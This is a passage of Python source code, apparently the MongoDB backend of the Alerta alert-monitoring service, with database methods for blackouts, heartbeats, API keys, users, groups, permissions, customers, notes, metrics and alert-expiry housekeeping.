{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
]}]
if current_app.config['CUSTOMER_VIEWS']:
query['$and'].append({'$or': [{'customer': None}, {'customer': alert.customer}]})
if self.get_db().blackouts.find_one(query):
return True
return False
def update_blackout(self, id, **kwargs):
return self.get_db().blackouts.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_blackout(self, id):
response = self.get_db().blackouts.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
# HEARTBEATS
def upsert_heartbeat(self, heartbeat):
return self.get_db().heartbeats.find_one_and_update(
{
'origin': heartbeat.origin,
'customer': heartbeat.customer
},
{
'$setOnInsert': {
'_id': heartbeat.id
},
'$set': {
'origin': heartbeat.origin,
'tags': heartbeat.tags,
'attributes': heartbeat.attributes,
'type': heartbeat.event_type,
'createTime': heartbeat.create_time,
'timeout': heartbeat.timeout,
'receiveTime': heartbeat.receive_time,
'customer': heartbeat.customer
}
},
upsert=True,
return_document=ReturnDocument.AFTER
)
def get_heartbeat(self, id, customers=None):
if len(id) == 8:
query = {'_id': {'$regex': '^' + id}}
else:
query = {'_id': id}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().heartbeats.find_one(query)
def get_heartbeats(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().heartbeats.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_heartbeats_by_status(self, status=None, query=None, page=None, page_size=None):
status = status or list()
query = query or Query()
max_latency = current_app.config['HEARTBEAT_MAX_LATENCY']
pipeline = [{'$match': query.where}]
if status:
pipeline.extend([
{'$addFields': {'timeoutInMs': {'$multiply': ['$timeout', 1000]}}},
{'$addFields': {'isExpired': {'$gt': [{'$subtract': [datetime.utcnow(), '$receiveTime']}, '$timeoutInMs']}}},
{'$addFields': {'isSlow': {'$gt': [{'$subtract': ['$receiveTime', '$createTime']}, max_latency]}}}
])
match_or = list()
if HeartbeatStatus.OK in status:
match_or.append({'isExpired': False, 'isSlow': False})
if HeartbeatStatus.Expired in status:
match_or.append({'isExpired': True})
if HeartbeatStatus.Slow in status:
match_or.append({'isExpired': False, 'isSlow': True})
pipeline.append({'$match': {'$or': match_or}})
pipeline.extend([
{'$sort': {k: v for k, v in query.sort}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size}
])
return self.get_db().heartbeats.aggregate(pipeline)
def get_heartbeats_count(self, query=None):
query = query or Query()
return self.get_db().heartbeats.count_documents(query.where)
def delete_heartbeat(self, id):
response = self.get_db().heartbeats.delete_one({'_id': {'$regex': '^' + id}})
return True if response.deleted_count == 1 else False
# API KEYS
# save
def create_key(self, key):
data = {
'_id': key.id,
'key': key.key,
'user': key.user,
'scopes': key.scopes,
'text': key.text,
'expireTime': key.expire_time,
'count': key.count,
'lastUsedTime': key.last_used_time
}
if key.customer:
data['customer'] = key.customer
if self.get_db().keys.insert_one(data).inserted_id == key.id:
return data
# get
def get_key(self, key, user=None):
query = {'$or': [{'key': key}, {'_id': key}]}
if user:
query['user'] = user
return self.get_db().keys.find_one(query)
# list
def get_keys(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().keys.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_keys_by_user(self, user):
return self.get_db().keys.find({'user': user})
def get_keys_count(self, query=None):
query = query or Query()
return self.get_db().keys.count_documents(query.where)
def update_key(self, key, **kwargs):
return self.get_db().keys.find_one_and_update(
{'$or': [{'key': key}, {'_id': key}]},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
# update
def update_key_last_used(self, key):
return self.get_db().keys.update_one(
{'$or': [{'key': key}, {'_id': key}]},
{
'$set': {'lastUsedTime': datetime.utcnow()},
'$inc': {'count': 1}
}
).matched_count == 1
# delete
def delete_key(self, key):
query = {'$or': [{'key': key}, {'_id': key}]}
response = self.get_db().keys.delete_one(query)
return True if response.deleted_count == 1 else False
# USERS
def create_user(self, user):
data = {
'_id': user.id,
'name': user.name,
'login': user.login,
'password': user.password,
'email': user.email,
'status': user.status,
'roles': user.roles,
'attributes': user.attributes,
'createTime': user.create_time,
'lastLogin': user.last_login,
'text': user.text,
'updateTime': user.update_time,
'email_verified': user.email_verified
}
if self.get_db().users.insert_one(data).inserted_id == user.id:
return data
# get
def get_user(self, id):
query = {'_id': id}
return self.get_db().users.find_one(query)
# list
def get_users(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().users.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_users_count(self, query=None):
query = query or Query()
return self.get_db().users.count_documents(query.where)
def get_user_by_username(self, username):
if not username:
return
query = {'$or': [{'login': username}, {'email': username}]}
return self.get_db().users.find_one(query)
def get_user_by_email(self, email):
if not email:
return
query = {'email': email}
return self.get_db().users.find_one(query)
def get_user_by_hash(self, hash):
query = {'hash': hash}
return self.get_db().users.find_one(query)
def update_last_login(self, id):
return self.get_db().users.update_one(
{'_id': id},
update={'$set': {'lastLogin': datetime.utcnow()}}
).matched_count == 1
def update_user(self, id, **kwargs):
update = dict()
if 'attributes' in kwargs:
update['$set'] = {k: v for k, v in kwargs.items() if k != 'attributes'}
set_value = {'attributes.' + k: v for k, v in kwargs['attributes'].items() if v is not None}
if set_value:
update['$set'].update(set_value)
unset_value = {'attributes.' + k: v for k, v in kwargs['attributes'].items() if v is None}
if unset_value:
update['$unset'] = unset_value
else:
update['$set'] = kwargs
return self.get_db().users.find_one_and_update(
{'_id': {'$regex': '^' + id}}, update=update, return_document=ReturnDocument.AFTER
)
def update_user_attributes(self, id, old_attrs, new_attrs):
"""
Set all attributes and unset attributes by using a value of 'null'.
"""
from alerta.utils.collections import merge
merge(old_attrs, new_attrs)
attrs = {k: v for k, v in old_attrs.items() if v is not None}
update = {
'$set': {'attributes': attrs}
}
response = self.get_db().users.update_one({'_id': {'$regex': '^' + id}}, update=update)
return response.matched_count > 0
def delete_user(self, id):
response = self.get_db().users.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
def set_email_hash(self, id, hash):
return self.get_db().users.update_one(
{'_id': id},
update={'$set': {'hash': hash, 'updateTime': datetime.utcnow()}}
).matched_count == 1
# GROUPS
def create_group(self, group):
data = {
'_id': group.id,
'name': group.name,
'text': group.text
}
if self.get_db().groups.insert_one(data).inserted_id == group.id:
return data
def get_group(self, id):
query = {'_id': id}
return self.get_db().groups.find_one(query)
def get_groups(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().groups.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_groups_count(self, query=None):
query = query or Query()
return self.get_db().groups.count_documents(query.where)
def get_group_users(self, id):
pipeline = [
{'$match': {'_id': id}},
{'$unwind': '$users'},
{'$lookup': {
'from': 'users',
'localField': 'users',
'foreignField': '_id',
'as': 'groupUser'
}},
{'$project': {'groupUser': 1}} # u.id, u.login, u.email, u.name, u.status
]
responses = self.get_db().groups.aggregate(pipeline)
users = list()
for response in responses:
users.append(
{
'id': response['groupUser'][0]['_id'],
'login': response['groupUser'][0].get('login'),
'email': response['groupUser'][0]['email'],
'name': response['groupUser'][0]['name'],
'status': response['groupUser'][0]['status']
}
)
return users
def update_group(self, id, **kwargs):
return self.get_db().groups.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def add_user_to_group(self, group, user):
response = self.get_db().groups.update_one(
{'_id': group}, {'$addToSet': {'users': user}})
return response.matched_count > 0
def remove_user_from_group(self, group, user):
response = self.get_db().groups.update_one({'_id': group}, {'$pullAll': {'users': [user]}})
return response.matched_count > 0
def delete_group(self, id):
response = self.get_db().groups.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
def get_groups_by_user(self, user):
return self.get_db().groups.find({'users': user})
# PERMISSIONS
def create_perm(self, perm):
data = {
'_id': perm.id,
'match': perm.match,
'scopes': perm.scopes
}
if self.get_db().perms.insert_one(data).inserted_id == perm.id:
return data
def get_perm(self, id):
query = {'_id': id}
return self.get_db().perms.find_one(query)
def get_perms(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().perms.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_perms_count(self, query=None):
query = query or Query()
return self.get_db().perms.count_documents(query.where)
def update_perm(self, id, **kwargs):
return self.get_db().perms.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_perm(self, id):
response = self.get_db().perms.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
def get_scopes_by_match(self, login, matches):
if login in current_app.config['ADMIN_USERS']:
return ADMIN_SCOPES
scopes = list()
for match in matches:
if match in current_app.config['ADMIN_ROLES']:
return ADMIN_SCOPES
if match in current_app.config['USER_ROLES']:
scopes.extend(current_app.config['USER_DEFAULT_SCOPES'])
if match in current_app.config['GUEST_ROLES']:
scopes.extend(current_app.config['GUEST_DEFAULT_SCOPES'])
response = self.get_db().perms.find_one({'match': match}, projection={'scopes': 1, '_id': 0})
if response:
scopes.extend(response['scopes'])
return sorted(set(scopes))
# CUSTOMERS
def create_customer(self, customer):
data = {
'_id': customer.id,
'match': customer.match,
'customer': customer.customer
}
if self.get_db().customers.insert_one(data).inserted_id == customer.id:
return data
def get_customer(self, id):
query = {'_id': id}
return self.get_db().customers.find_one(query)
def get_customers(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().customers.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_customers_count(self, query=None):
query = query or Query()
return self.get_db().customers.count_documents(query.where)
def update_customer(self, id, **kwargs):
return self.get_db().customers.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_customer(self, id):
response = self.get_db().customers.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
def get_customers_by_match(self, login, matches):
if login in current_app.config['ADMIN_USERS']:
return '*' # all customers
customers = []
for match in [login] + matches:
for r in self.get_db().customers.find({'match': match}):
customers.append(r['customer'])
if customers:
if '*' in customers:
return '*' # all customers
return customers
raise NoCustomerMatch(f"No customer lookup configured for user '{login}' or '{','.join(matches)}'")
# NOTES
def create_note(self, note):
data = {
'_id': note.id,
'text': note.text,
'user': note.user,
'attributes': note.attributes,
'type': note.note_type,
'createTime': note.create_time,
'updateTime': note.update_time,
'alert': note.alert
}
if note.customer:
data['customer'] = note.customer
if self.get_db().notes.insert_one(data).inserted_id == note.id:
return data
def get_note(self, id):
query = {'_id': id}
return self.get_db().notes.find_one(query)
def get_notes(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().notes.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_alert_notes(self, id, page=None, page_size=None):
if len(id) == 8:
query = {'alert': {'$regex': '^' + id}}
else:
query = {'alert': id}
return self.get_db().notes.find(query).skip((page - 1) * page_size).limit(page_size)
def get_customer_notes(self, customer, page=None, page_size=None):
return self.get_db().notes.find({'customer': customer}).skip((page - 1) * page_size).limit(page_size)
def update_note(self, id, **kwargs):
kwargs['updateTime'] = datetime.utcnow()
return self.get_db().notes.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_note(self, id):
response = self.get_db().notes.delete_one({'_id': id})
return True if response.deleted_count == 1 else False
# METRICS
def get_metrics(self, type=None):
query = {'type': type} if type else {}
return list(self.get_db().metrics.find(query, {'_id': 0}))
def set_gauge(self, gauge):
return self.get_db().metrics.find_one_and_update(
{
'group': gauge.group,
'name': gauge.name
},
{
'$set': {
'group': gauge.group,
'name': gauge.name,
'title': gauge.title,
'description': gauge.description,
'value': gauge.value,
'type': 'gauge'
}
},
upsert=True,
return_document=ReturnDocument.AFTER
)['value']
def inc_counter(self, counter):
return self.get_db().metrics.find_one_and_update(
{
'group': counter.group,
'name': counter.name
},
{
'$set': {
'group': counter.group,
'name': counter.name,
'title': counter.title,
'description': counter.description,
'type': 'counter'
},
'$inc': {'count': counter.count}
},
upsert=True,
return_document=ReturnDocument.AFTER
)['count']
def update_timer(self, timer):
return self.get_db().metrics.find_one_and_update(
{
'group': timer.group,
'name': timer.name
},
{
'$set': {
'group': timer.group,
'name': timer.name,
'title': timer.title,
'description': timer.description,
'type': 'timer'
},
'$inc': {'count': timer.count, 'totalTime': timer.total_time}
},
upsert=True,
return_document=ReturnDocument.AFTER
)
# HOUSEKEEPING
def get_expired(self, expired_threshold, info_threshold):
# delete 'closed' or 'expired' alerts older than "expired_threshold" seconds
# and 'informational' alerts older than "info_threshold" seconds
if expired_threshold:
expired_seconds_ago = datetime.utcnow() - timedelta(seconds=expired_threshold)
self.get_db().alerts.delete_many(
{'status': {'$in': ['closed', 'expired']}, 'lastReceiveTime': {'$lt': expired_seconds_ago}})
if info_threshold:
info_seconds_ago = datetime.utcnow() - timedelta(seconds=info_threshold)
self.get_db().alerts.delete_many({'severity': alarm_model.DEFAULT_INFORM_SEVERITY, 'lastReceiveTime': {'$lt': info_seconds_ago}})
# get list of alerts to be newly expired
pipeline = [
{'$match': {'status': {'$nin': ['expired']}}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$timeout', current_app.config['ALERT_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$lastReceiveTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)
def get_unshelve(self):
# get list of alerts to be unshelved
pipeline = [
{'$match': {'status': 'shelved'}},
{'$unwind': '$history'},
{'$match': {
'history.type': 'shelve',
'history.status': 'shelved'
}},
{'$sort': {'history.updateTime': -1}},
{'$group': {
'_id': '$_id',
'resource': {'$first': '$resource'},
'event': {'$first': '$event'},
'environment': {'$first': '$environment'},
'severity': {'$first': '$severity'},
'correlate': {'$first': '$correlate'},
'status': {'$first': '$status'},
'service': {'$first': '$service'},
'group': {'$first': '$group'},
'value': {'$first': '$value'},
'text': {'$first': '$text'},
'tags': {'$first': '$tags'},
'attributes': {'$first': '$attributes'},
'origin': {'$first': '$origin'},
'type': {'$first': '$type'},
'createTime': {'$first': '$createTime'},
'timeout': {'$first': '$timeout'},
'rawData': {'$first': '$rawData'},
'customer': {'$first': '$customer'},
'duplicateCount': {'$first': '$duplicateCount'},
'repeat': {'$first': '$repeat'},
'previousSeverity': {'$first': '$previousSeverity'},
'trendIndication': {'$first': '$trendIndication'},
'receiveTime': {'$first': '$receiveTime'},
'lastReceiveId': {'$first': '$lastReceiveId'},
'lastReceiveTime': {'$first': '$lastReceiveTime'},
'updateTime': {'$first': '$updateTime'},
'history': {'$first': '$history'},
}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$history.timeout', current_app.config['SHELVE_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$updateTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)
def get_unack(self):
# get list of alerts to be unack'ed
pipeline = [
{'$match': {'status': 'ack'}},
{'$unwind': '$history'},
{'$match': {
'history.type': 'ack',
'history.status': 'ack'
}},
{'$sort': {'history.updateTime': -1}},
{'$group': {
'_id': '$_id',
'resource': {'$first': '$resource'},
'event': {'$first': '$event'},
'environment': {'$first': '$environment'},
'severity': {'$first': '$severity'},
'correlate': {'$first': '$correlate'},
'status': {'$first': '$status'},
'service': {'$first': '$service'},
'group': {'$first': '$group'},
'value': {'$first': '$value'},
'text': {'$first': '$text'},
'tags': {'$first': '$tags'},
'attributes': {'$first': '$attributes'},
'origin': {'$first': '$origin'},
'type': {'$first': '$type'},
'createTime': {'$first': '$createTime'},
'timeout': {'$first': '$timeout'},
'rawData': {'$first': '$rawData'},
'customer': {'$first': '$customer'},
'duplicateCount': {'$first': '$duplicateCount'},
'repeat': {'$first': '$repeat'},
'previousSeverity': {'$first': '$previousSeverity'},
'trendIndication': {'$first': '$trendIndication'},
'receiveTime': {'$first': '$receiveTime'},
'lastReceiveId': {'$first': '$lastReceiveId'},
'lastReceiveTime': {'$first': '$lastReceiveTime'},
'updateTime': {'$first': '$updateTime'},
'history': {'$first': '$history'},
}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$history.timeout', current_app.config['ACK_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$updateTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.